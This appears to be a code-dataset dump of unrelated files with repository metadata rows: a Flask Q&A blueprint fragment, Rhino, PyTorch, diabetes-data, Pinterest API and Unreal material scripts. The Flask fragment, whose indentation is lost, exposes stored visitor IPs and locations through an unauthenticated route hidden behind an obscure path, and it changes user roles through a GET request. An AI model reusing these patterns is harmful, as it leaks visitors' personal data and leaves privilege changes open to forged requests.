coords = []
for stat in stats:
coordinate = []
first = float(stat.loc.split(',')[0])
second = float(stat.loc.split(',')[1])
coordinate.append(second)
coordinate.append(first)
coords.append(coordinate)
return json.dumps(coords), 200
return 'hi',200
@main.route('/api/get-records/awersgfjkweshjbs', methods=['GET'])
def apiToGetStats():
if request.method == 'GET':
stats = Stats.query.filter().all()
coords = []
for stat in stats:
row1= []
row1.append(stat.ip)
row1.append(stat.loc)
row1.append(stat.city)
row1.append(stat.country)
row1.append(stat.org)
row1.append(stat.postal)
row1.append(stat.region)
row1.append(stat.timezone)
row1.append(stat.time)
# row=stat.ip+','+stat.loc+','+stat.city+','+stat.country+','+stat.org+','+stat.postal+','+stat.region+','+stat.timezone+','+stat.time
coords.append(row1)
return json.dumps(coords), 200
return 'hi',200
@main.route('/answer/<int:question_id>', methods=['GET', 'POST'])
@login_required
def answer(question_id):
if not current_user.expert:
return redirect(url_for('main.index'))
question = Question.query.get_or_404(question_id)
if request.method == 'POST':
question.answer = request.form['answer']
db.session.commit()
return redirect(url_for('main.unanswered'))
context = {
'question' : question
}
return render_template('answer.html', **context)
@main.route('/question/<int:question_id>')
def question(question_id):
question = Question.query.get_or_404(question_id)
context = {
'question' : question
}
return render_template('question.html', **context)
@main.route('/unanswered')
@login_required
def unanswered():
if not current_user.expert:
return redirect(url_for('main.index'))
unanswered_questions = Question.query\
.filter_by(expert_id=current_user.id)\
.filter(Question.answer == None)\
.all()
context = {
'unanswered_questions' : unanswered_questions
}
return render_template('unanswered.html', **context)
@main.route('/users')
@login_required
def users():
if not current_user.admin:
return redirect(url_for('main.index'))
users = User.query.filter_by(admin=False).all()
context = {
'users' : users
}
return render_template('users.html', **context)
@main.route('/promote/<int:user_id>')
@login_required
def promote(user_id):
if not current_user.admin:
return redirect(url_for('main.index'))
user = User.query.get_or_404(user_id)
user.expert = True
db.session.commit()
return redirect(url_for('main.users'))
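# Usage sketch (assumption, not part of the blueprint): exercising the notes
# API from a separate client process; host/port are illustrative.
#
#   import requests
#   requests.post('http://localhost:5000/api/postNotes',
#                 data={'username': 'alice', 'notes': '[{"title": "todo"}]'})
#   print(requests.get('http://localhost:5000/api/getNotes/alice').json())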
| 27.379447
| 147
| 0.549877
| 0
| 0
| 0
| 0
| 6,579
| 0.949762
| 0
| 0
| 1,212
| 0.174968
|
65b1a21d6fc172f7d80c2944e861d993aee45a5a
| 7,453
|
py
|
Python
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 235
|
2017-11-07T07:33:22.000Z
|
2022-03-25T16:20:00.000Z
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 770
|
2017-09-22T13:42:06.000Z
|
2022-03-31T21:26:45.000Z
|
src/compas_rhino/utilities/misc.py
|
XingxinHE/compas
|
d2901dbbacdaf4694e5adae78ba8f093f10532bf
|
[
"MIT"
] | 99
|
2017-11-06T23:15:28.000Z
|
2022-03-25T16:05:36.000Z
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import os
import sys
import ast
from compas_rhino.forms import TextForm
from compas_rhino.forms import ImageForm
import System
import rhinoscriptsyntax as rs
import Rhino
import clr
clr.AddReference('Rhino.UI')
import Rhino.UI # noqa: E402
from Rhino.UI.Dialogs import ShowMessageBox # noqa: E402
try:
from compas_rhino.forms import PropertyListForm
except ImportError:
from Rhino.UI.Dialogs import ShowPropertyListBox
__all__ = [
'wait',
'get_tolerance',
'toggle_toolbargroup',
'pick_point',
'browse_for_folder',
'browse_for_file',
'print_display_on',
'display_message',
'display_text',
'display_image',
'display_html',
'update_settings',
'update_named_values',
'screenshot_current_view',
'select_folder',
'select_file',
'unload_modules',
]
# ==============================================================================
# Truly miscellaneous :)
# ==============================================================================
def screenshot_current_view(path,
width=1920,
height=1080,
scale=1,
draw_grid=False,
draw_world_axes=False,
draw_cplane_axes=False,
background=False):
"""Take a screenshot of the current view.
Parameters
----------
path : str
The filepath for saving the screenshot.
Other Parameters
----------------
width : int, optional
height : int, optional
scale : float, optional
draw_grid : bool, optional
draw_world_axes : bool, optional
draw_cplane_axes : bool, optional
background : bool, optional
Returns
-------
bool
True if the command was successful.
False otherwise.
"""
properties = [draw_grid, draw_world_axes, draw_cplane_axes, background]
properties = ["Yes" if item else "No" for item in properties]
scale = max(1, scale) # the rhino command requires a scale > 1
rs.EnableRedraw(True)
rs.Sleep(0)
result = rs.Command("-_ViewCaptureToFile \"" + os.path.abspath(path) + "\""
" Width=" + str(width) +
" Height=" + str(height) +
" Scale=" + str(scale) +
" DrawGrid=" + properties[0] +
" DrawWorldAxes=" + properties[1] +
" DrawCPlaneAxes=" + properties[2] +
" TransparentBackground=" + properties[3] +
" _enter", False)
rs.EnableRedraw(False)
return result
def wait():
return Rhino.RhinoApp.Wait()
def get_tolerance():
"""Get the absolute tolerance.
Returns
-------
float
The tolerance.
"""
return rs.UnitAbsoluteTolerance()
def toggle_toolbargroup(rui, group):
if not os.path.exists(rui) or not os.path.isfile(rui):
return
collection = rs.IsToolbarCollection(rui)
if not collection:
collection = rs.OpenToolbarCollection(rui)
if rs.IsToolbar(collection, group, True):
rs.ShowToolbar(collection, group)
else:
if rs.IsToolbar(collection, group, True):
if rs.IsToolbarVisible(collection, group):
rs.HideToolbar(collection, group)
else:
rs.ShowToolbar(collection, group)
def pick_point(message='Pick a point.'):
point = rs.GetPoint(message)
if point:
return list(point)
return None
# ==============================================================================
# File system
# ==============================================================================
def browse_for_folder(message=None, default=None):
return rs.BrowseForFolder(folder=default, message=message, title='compas')
select_folder = browse_for_folder
def browse_for_file(title=None, folder=None, filter=None):
if filter == 'json':
filter = 'JSON files (*.json)|*.json||'
elif filter == 'obj':
filter = 'OBJ files (*.obj)|*.obj||'
elif filter == 'fofin':
filter = 'FOFIN session files (*.fofin)|*.fofin||'
else:
pass
return rs.OpenFileName(title, filter=filter, folder=folder)
select_file = browse_for_file
# ==============================================================================
# Display
# ==============================================================================
def print_display_on(on=True):
if on:
rs.Command('_PrintDisplay State On Color Display Thickness 1 _Enter')
else:
rs.Command('_PrintDisplay State Off _Enter')
def display_message(message):
return ShowMessageBox(message, 'Message')
def display_text(text, title='Text', width=800, height=600):
if isinstance(text, (list, tuple)):
text = '{0}'.format(System.Environment.NewLine).join(text)
form = TextForm(text, title, width, height)
return form.show()
def display_image(image, title='Image', width=800, height=600):
form = ImageForm(image, title, width, height)
return form.show()
def display_html():
raise NotImplementedError
# ==============================================================================
# Settings and attributes
# ==============================================================================
def update_named_values(names, values, message='', title='Update named values', evaluate=False):
try:
dialog = PropertyListForm(names, values)
except Exception:
values = ShowPropertyListBox(message, title, names, values)
else:
if dialog.ShowModal(Rhino.UI.RhinoEtoApp.MainWindow):
values = dialog.values
else:
values = None
if evaluate:
if values:
values = list(values)
for i in range(len(values)):
value = values[i]
try:
value = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
pass
values[i] = value
return values
def update_settings(settings, message='', title='Update settings'):
names = sorted(settings.keys())
values = [str(settings[name]) for name in names]
values = update_named_values(names, values, message=message, title=title)
if values:
values = list(values)
for name, value in zip(names, values):
try:
settings[name] = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
settings[name] = value
return True
return False
def unload_modules(top_level_module_name):
"""Unloads all modules named starting with the specified string.
This function eases the development workflow when editing a library that is
used from Rhino/Grasshopper.
Parameters
----------
top_level_module_name : :obj:`str`
Name of the top-level module to unload.
Returns
-------
list
List of unloaded module names.
"""
    # Materialize the matches first: popping entries from sys.modules while
    # iterating a lazy filter over it raises a RuntimeError.
    modules = list(filter(lambda m: m.startswith(top_level_module_name), sys.modules))
    for module in modules:
        sys.modules.pop(module)
    return modules
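# Usage sketch (assumption, run inside Rhino's Python editor; the settings
# keys and the output path are illustrative):
#
#   settings = {'scale': 1.0, 'show.grid': True}
#   update_settings(settings)
#   screenshot_current_view('C:/Temp/view.png', width=1280, height=720)
#   unload_modules('compas')   # drop all compas* modules so edits are picked up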
| 27.603704
| 96
| 0.56058
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,484
| 0.333289
|
65b235fdfa7ea03f6e55907463fc98d053669de0
| 3,539
|
py
|
Python
|
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | 4
|
2021-07-14T19:18:47.000Z
|
2022-03-21T17:50:46.000Z
|
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | null | null | null |
lib/utils/visualization/fixup_resnet.py
|
yandex-research/learnable-init
|
480627217763912e83251833df2d678c8b6ea6fd
|
[
"Apache-2.0"
] | null | null | null |
import torch
import numpy as np
import matplotlib.pyplot as plt
from lib.utils import moving_average, check_numpy
@torch.no_grad()
def visualize_pdf(maml):
i = 0
plt.figure(figsize=[22, 34])
for name, (weight_maml_init, bias_maml_init) in maml.initializers.items():
weight_base_init, _ = maml.untrained_initializers[name]
base_mean = weight_base_init.mean.item()
base_std = weight_base_init.std.item()
maml_mean = weight_maml_init.mean.item()
maml_std = weight_maml_init.std.item()
base_init = torch.distributions.Normal(base_mean, base_std)
maml_init = torch.distributions.Normal(maml_mean, maml_std)
i += 1
plt.subplot(6, 4, i)
xx = np.linspace(min([base_mean - 3.*base_std, maml_mean - 3.*maml_std]),
max([base_mean + 3.*base_std, maml_mean + 3.*maml_std]), 1000)
if i == 12:
yy = base_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, '--', label='Fixup')
yy = maml_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, c='g', label='Fixup + DIMAML')
leg = plt.legend(loc=4, fontsize=14.5, frameon=False)
for line in leg.get_lines():
line.set_linewidth(1.6)
else:
yy = base_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, '--')
yy = maml_init.log_prob(torch.tensor(xx)).exp().numpy()
plt.plot(xx, yy, c='g')
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.title(name + '_weight', fontsize=14)
plt.show()
@torch.no_grad()
def visualize_quantile_functions(maml):
plt.figure(figsize=[22, 34])
i = 0
for name, (weight_quantile_function, bias_quantile_function) in maml.initializers.items():
wq_init, bq_init = maml.untrained_initializers[name]
i += 1
plt.subplot(6, 4, i)
xx = torch.linspace(0., 1., 1000).cuda()
if i == 12:
yy = wq_init(xx)
plt.plot(check_numpy(xx), check_numpy(yy), '--', label='Fixup')
yy = weight_quantile_function(xx)
plt.plot(check_numpy(xx), check_numpy(yy), c='g', label='Fixup $\\rightarrow$ DIMAML')
leg = plt.legend(loc=4, fontsize=14, frameon=False)
for line in leg.get_lines():
line.set_linewidth(1.6)
else:
yy = wq_init(xx)
plt.plot(check_numpy(xx), check_numpy(yy), '--')
yy = weight_quantile_function(xx)
plt.plot(check_numpy(xx), check_numpy(yy), c='g')
plt.xlim([0, 1])
plt.title(name + '_weight')
plt.show()
def draw_plots(base_train_loss, base_test_loss, base_test_error,
maml_train_loss, maml_test_loss, maml_test_error):
plt.figure(figsize=(20, 6))
plt.subplot(1,3,1)
plt.plot(moving_average(base_train_loss, span=10), label='Baseline')
plt.plot(moving_average(maml_train_loss, span=10), c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Train loss", fontsize=14)
plt.subplot(1,3,2)
plt.plot(base_test_loss, label='Baseline')
plt.plot(maml_test_loss, c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Test loss", fontsize=14)
plt.subplot(1,3,3)
plt.plot(base_test_error, label='Baseline')
plt.plot(maml_test_error, c='g', label='DIMAML')
plt.legend(fontsize=14)
plt.title("Test classification error", fontsize=14)
| 39.322222
| 98
| 0.607234
| 0
| 0
| 0
| 0
| 2,614
| 0.738627
| 0
| 0
| 218
| 0.061599
|
65b25da916e80ac5c60ab157203cd5360dfed5f5
| 3,170
|
py
|
Python
|
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
DataPreprocessing/load_diabetes.py
|
iosifidisvasileios/CumulativeCostBoosting
|
05a51390c7cadb23eb47b94406b2aa509d25716d
|
[
"MIT"
] | null | null | null |
from __future__ import division
# import urllib2
import os, sys
import numpy as np
import pandas as pd
from collections import defaultdict
from sklearn import feature_extraction
from sklearn import preprocessing
from random import seed, shuffle
# sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
# import utils as ut
SEED = 1234
seed(SEED)
np.random.seed(SEED)
def load_diabetes():
FEATURES_CLASSIFICATION = ["race", "gender", "age", "weight", "admission_type_id",
"discharge_disposition_id", "admission_source_id", "time_in_hospital", "payer_code",
"medical_specialty", "num_lab_procedures", "num_procedures", "num_medications",
"number_outpatient", "number_emergency", "number_inpatient", "diag_1", "diag_2",
"diag_3", "number_diagnoses", "max_glu_serum", "A1Cresult", "metformin", "repaglinide",
"nateglinide", "chlorpropamide", "glimepiride", "acetohexamide", "glipizide",
"glyburide", "tolbutamide", "pioglitazone", "rosiglitazone", "acarbose", "miglitol",
"troglitazone", "tolazamide", "examide", "citoglipton", "insulin", "glyburide-metformin",
"glipizide-metformin", "glimepiride-pioglitazone", "metformin-rosiglitazone",
"metformin-pioglitazone", "change", "readmitted"]
CONT_VARIABLES = ["admission_type_id",
"discharge_disposition_id", "admission_source_id", "time_in_hospital", "num_lab_procedures",
"num_procedures", "num_medications",
"number_outpatient", "number_emergency", "number_inpatient", "number_diagnoses"]
CLASS_FEATURE = "diabetesMed" # the decision variable
COMPAS_INPUT_FILE = "DataPreprocessing/diabetic_data.csv"
df = pd.read_csv(COMPAS_INPUT_FILE)
# convert to np array
data = df.to_dict('list')
for k in data.keys():
data[k] = np.array(data[k])
""" Feature normalization and one hot encoding """
# convert class label 0 to -1
y = data[CLASS_FEATURE]
y[y == 'No'] = "1"
y[y == "Yes"] = '-1'
y = np.array([int(k) for k in y])
X = np.array([]).reshape(len(y), 0) # empty array with num rows same as num examples, will hstack the features to it
cl_names = []
for attr in FEATURES_CLASSIFICATION:
vals = data[attr]
if attr in CONT_VARIABLES:
vals = [float(v) for v in vals]
vals = preprocessing.scale(vals) # 0 mean and 1 variance
vals = np.reshape(vals, (len(y), -1)) # convert from 1-d arr to a 2-d arr with one col
cl_names.append(attr)
        else:  # categorical variables are one-hot encoded with pandas get_dummies
xxx = pd.get_dummies(vals, prefix=attr, prefix_sep='?')
cl_names += [at_in for at_in in xxx.columns]
vals = xxx
# add to learnable features
X = np.hstack((X, vals))
return X, y, cl_names
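# Usage sketch (assumption, not part of the loader): a quick end-to-end check
# with scikit-learn; the classifier choice is illustrative.
if __name__ == "__main__":
    from sklearn.model_selection import train_test_split
    from sklearn.linear_model import LogisticRegression
    X, y, feature_names = load_diabetes()
    X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.2, random_state=SEED)
    clf = LogisticRegression(max_iter=1000).fit(X_tr, y_tr)
    print("test accuracy:", clf.score(X_te, y_te))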
| 44.647887
| 121
| 0.613565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,493
| 0.470978
|
65b262473f8b6de6d59edf029ac0e4e27f71979d
| 2,300
|
py
|
Python
|
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
python/scripts/copy_pin.py
|
ehabnaduvi/api-quickstart
|
956409098cbce1bf3674d739fe64ebafaaf63ca3
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copying a pin is not representative of typical user behavior on Pinterest.
#
# This script is intended to demonstrate how to use the API to developers,
# and to provide functionality that might be convenient for developers.
# For example, it might be used as part of a program to generate an
# account to be used to test an API-based application.
#
import argparse
import sys
from os.path import abspath, dirname, join
sys.path.append(abspath(join(dirname(__file__), "..", "src")))
from api_config import ApiConfig
from arguments import common_arguments
def main(argv=[]):
"""
This script copies a pin to a board, both of which are specified by identifiers
that can be found using the get_user_pins.py and get_user_boards.py script.
If a section identifier is specified in addition to a board identifier,
this script will copy the pin to the board section. Section identifiers can be
found using the get_board.py script. A section identifier may not be specified
without a board identifier.
"""
parser = argparse.ArgumentParser(description="Copy a Pin")
parser.add_argument("-p", "--pin-id", required=True, help="source pin identifier")
parser.add_argument("-m", "--media", help="media path or id")
parser.add_argument(
"-b", "--board-id", required=True, help="destination board identifier"
)
parser.add_argument("-s", "--section", help="destination board section")
common_arguments(parser)
args = parser.parse_args(argv)
# get configuration from defaults and/or the environment
api_config = ApiConfig(verbosity=args.log_level, version=args.api_version)
# imports that depend on the version of the API
from access_token import AccessToken
from oauth_scope import Scope
from pin import Pin
access_token = AccessToken(api_config, name=args.access_token)
access_token.fetch(scopes=[Scope.READ_PINS, Scope.WRITE_BOARDS, Scope.WRITE_PINS])
pin = Pin(args.pin_id, api_config, access_token)
pin_data = pin.get()
print("source pin:")
Pin.print_summary(pin_data)
new_pin_data = pin.create(pin_data, args.board_id, args.section, args.media)
print("new pin:")
Pin.print_summary(new_pin_data)
if __name__ == "__main__":
main(sys.argv[1:])
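# Usage sketch (assumption): typical command-line invocations, with placeholder
# pin/board/section identifiers.
#
#   python scripts/copy_pin.py -p <pin-id> -b <board-id>
#   python scripts/copy_pin.py -p <pin-id> -b <board-id> -s <section-id>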
| 37.096774
| 86
| 0.729565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,129
| 0.49087
|
65b30f63399f7d1910889d551fa68b83b2e4d6e6
| 10,308
|
py
|
Python
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | 31
|
2020-10-16T03:15:06.000Z
|
2022-01-31T03:06:44.000Z
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | 1
|
2020-10-16T07:02:25.000Z
|
2020-10-16T13:05:39.000Z
|
BL_ColorRamp4_MF.py
|
SpectralVectors/TransMat
|
590b04b273005d95f02b567562c08042c2937af4
|
[
"MIT"
] | null | null | null |
import unreal
BL_ColorRamp4 = unreal.AssetToolsHelpers.get_asset_tools().create_asset('BL_ColorRamp4', '/Engine/Functions/BLUI/', unreal.MaterialFunction, unreal.MaterialFunctionFactoryNew())
BL_ColorRamp4.set_editor_property("expose_to_library", True)
BL_ColorRamp4.set_editor_property("library_categories_text", ("BLUI", "Custom", "Utility"))
create_expression = unreal.MaterialEditingLibrary.create_material_expression_in_function
create_connection = unreal.MaterialEditingLibrary.connect_material_expressions
connect_property = unreal.MaterialEditingLibrary.connect_material_property
update_function = unreal.MaterialEditingLibrary.update_material_function
mat_func_separate = unreal.load_asset('/Engine/Functions/Engine_MaterialFunctions02/Utility/BreakOutFloat3Components')
mat_func_combine = unreal.load_asset('/Engine/Functions/Engine_MaterialFunctions02/Utility/MakeFloat3')
### Creating Nodes
Mix = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,-340.0, 3620.0)
Reroute01 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 3360.0)
Math20 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-640.0, 4415.648193359375)
Math19 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-800.0, 4415.648193359375)
Math18 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-800.0, 4235.648193359375)
Math21 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-640.0, 4235.648193359375)
Mix01 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,-20.0, 4480.0)
Math22 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-480.0, 4260.0)
Reroute10 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Reroute09 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Reroute08 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1120.0, 4360.0)
Math23 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-320.0, 4320.0)
Reroute06 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 4400.0)
Reroute07 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1840.0, 4400.0)
Reroute05 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-1849.2108154296875, 5160.0)
Reroute02 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Reroute03 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Reroute04 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionReroute,-960.0, 5080.0)
Math24 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-120.0, 5080.0)
Math25 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-280.0, 5040.0)
Math27 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-600.0, 5195.648193359375)
Math28 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-600.0, 5015.648193359375)
Math29 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-440.0, 5015.648193359375)
Math26 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-440.0, 5195.648193359375)
Mix02 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionLinearInterpolate,100.0, 5180.0)
Math12 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionSubtract,-1080.0, 3460.0)
Math15 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-920.0, 3460.0)
Math16 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionMultiply,-760.0, 3480.0)
Math17 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionAdd,-600.0, 3540.0)
Math14 = create_expression(BL_ColorRamp4,unreal.MaterialExpressionDivide,-900.0, 3640.0)
Math13 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionSubtract, -1080.0, 3640.0)
Position0 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3540.0)
Color0 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3620.0)
Position1 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3800.0)
Color1 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1580.0, 3880.0)
Position2 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1560.0, 4540.0)
Color2 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1560.0, 4620.0)
Position3 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -1360.0, 5320.0)
Color3 = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput,-1360.0, 5400.0)
Factor = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionInput, -2200.0, 3320.0)
OutputResult = create_expression(BL_ColorRamp4, unreal.MaterialExpressionFunctionOutput,400, 5280)
### Loading Material Functions and Textures
### Setting Values
Color0.input_name = 'Color0'
Color0.sort_priority = 0
Color0.preview_value = (0.0, 0.0, 0.0, 1.0)
Color0.use_preview_value_as_default = True
Position0.input_name = 'Position0'
Position0.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position0.sort_priority = 1
Position0.preview_value = (0.0, 0.0, 0.0, 1.0)
Position0.use_preview_value_as_default = True
Color1.input_name = 'Color1'
Color1.sort_priority = 2
Color1.preview_value = (1.0, 0.0, 0.0, 1.0)
Color1.use_preview_value_as_default = True
Position1.input_name = "Position1"
Position1.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position1.sort_priority = 3
Position1.preview_value = (0.125, 0, 0, 1)
Position1.use_preview_value_as_default = True
Color2.input_name = 'Color2'
Color2.sort_priority = 4
Color2.preview_value = (1.0, 0.5, 0.0, 1)
Color2.use_preview_value_as_default = True
Position2.input_name = "Position2"
Position2.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position2.sort_priority = 5
Position2.preview_value = (0.250, 0, 0, 1)
Position2.use_preview_value_as_default = True
Color3.input_name = 'Color3'
Color3.sort_priority = 6
Color3.preview_value = (1.0, 1, 0.0, 1)
Color3.use_preview_value_as_default = True
Position3.input_name = "Position3"
Position3.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Position3.sort_priority = 7
Position3.preview_value = (1, 0, 0, 1)
Position3.use_preview_value_as_default = True
Factor.input_name = 'Factor'
Factor.input_type = unreal.FunctionInputType.FUNCTION_INPUT_SCALAR
Factor.sort_priority = 8
Factor.preview_value = (0.0, 0.0, 0.0, 1.0)
Factor.use_preview_value_as_default = True
### Creating Connections
Color1_connection = create_connection(Color1, '', Mix, 'B')
Position1_connection = create_connection(Position1, '', Math12, 'A')
Position1_connection = create_connection(Position1, '', Math13, 'B')
Position1_connection = create_connection(Position1, '', Reroute09, '')
Position1_connection = create_connection(Position1, '', Reroute10, '')
Position1_connection = create_connection(Position1, '', Reroute08, '')
Mix_connection = create_connection(Mix, '', Mix01, 'A')
Position0_connection = create_connection(Position0, '', Math12, 'B')
Position0_connection = create_connection(Position0, '', Math14, 'A')
Position0_connection = create_connection(Position0, '', Math13, 'A')
Color0_connection = create_connection(Color0, '', Mix, 'A')
Reroute01_connection = create_connection(Reroute01, '', Reroute06, '')
Reroute01_connection = create_connection(Reroute01, '', Math16, 'B')
Reroute01_connection = create_connection(Reroute01, '', Reroute07, '')
Math20_connection = create_connection(Math20, '', Math23, 'B')
Math19_connection = create_connection(Math19, '', Math20, 'B')
Math18_connection = create_connection(Math18, '', Math21, 'B')
Math21_connection = create_connection(Math21, '', Math22, 'A')
Color2_connection = create_connection(Color2, '', Mix01, 'B')
Mix01_connection = create_connection(Mix01, '', Mix02, 'A')
Position2_connection = create_connection(Position2, '', Math18, 'A')
Position2_connection = create_connection(Position2, '', Math19, 'B')
Position2_connection = create_connection(Position2, '', Reroute03, '')
Position2_connection = create_connection(Position2, '', Reroute04, '')
Position2_connection = create_connection(Position2, '', Reroute02, '')
Math22_connection = create_connection(Math22, '', Math23, 'A')
Reroute10_connection = create_connection(Reroute10, '', Math20, 'A')
Reroute09_connection = create_connection(Reroute09, '', Math18, 'B')
Reroute08_connection = create_connection(Reroute08, '', Math19, 'A')
Math23_connection = create_connection(Math23, '', Mix01, 'Alpha')
Reroute06_connection = create_connection(Reroute06, '', Math22, 'B')
Reroute07_connection = create_connection(Reroute07, '', Reroute05, '')
Reroute05_connection = create_connection(Reroute05, '', Math25, 'B')
Reroute02_connection = create_connection(Reroute02, '', Math26, 'A')
Reroute03_connection = create_connection(Reroute03, '', Math28, 'B')
Reroute04_connection = create_connection(Reroute04, '', Math27, 'A')
Math24_connection = create_connection(Math24, '', Mix02, 'Alpha')
Math25_connection = create_connection(Math25, '', Math24, 'A')
Math27_connection = create_connection(Math27, '', Math26, 'B')
Math28_connection = create_connection(Math28, '', Math29, 'B')
Math29_connection = create_connection(Math29, '', Math25, 'A')
Color3_connection = create_connection(Color3, '', Mix02, 'B')
Math26_connection = create_connection(Math26, '', Math24, 'B')
Position3_connection = create_connection(Position3, '', Math28, 'A')
Position3_connection = create_connection(Position3, '', Math27, 'B')
Factor_connection = create_connection(Factor, '', Reroute01, '')
Math12_connection = create_connection(Math12, '', Math15, 'B')
Math15_connection = create_connection(Math15, '', Math16, 'A')
Math16_connection = create_connection(Math16, '', Math17, 'A')
Math17_connection = create_connection(Math17, '', Mix, 'Alpha')
Math14_connection = create_connection(Math14, '', Math17, 'B')
Math13_connection = create_connection(Math13, '', Math14, 'B')
Mix02_connection = create_connection(Mix02, '', OutputResult, '')
update_function()
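# For reference, a minimal CPU-side sketch of what the node graph above appears to
# compute (a 4-stop color ramp): each Mix node lerps between adjacent stops with
# alpha = (Factor - Position_i) / (Position_{i+1} - Position_i). This helper is
# illustrative only, is not part of the generated Unreal graph, and assumes stops
# are (position, (r, g, b, a)) pairs sorted by position.
def _color_ramp4_reference(factor, stops):
    for (p0, c0), (p1, c1) in zip(stops, stops[1:]):
        if factor <= p1:
            alpha = 0.0 if p1 == p0 else min(max((factor - p0) / (p1 - p0), 0.0), 1.0)
            return tuple(a + (b - a) * alpha for a, b in zip(c0, c1))
    return stops[-1][1]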
| 60.994083
| 178
| 0.796954
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 708
| 0.068685
|
65b36386e6a8fce39db4d492a4e6ead8f8c27f5c
| 6,731
|
py
|
Python
|
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
080a6b7fee1c651228f227f52a2bed6ff90579cf
|
[
"BSD-3-Clause"
] | null | null | null |
tools/log2csv.py
|
Haixing-Hu/lambda-tensorflow-benchmark
|
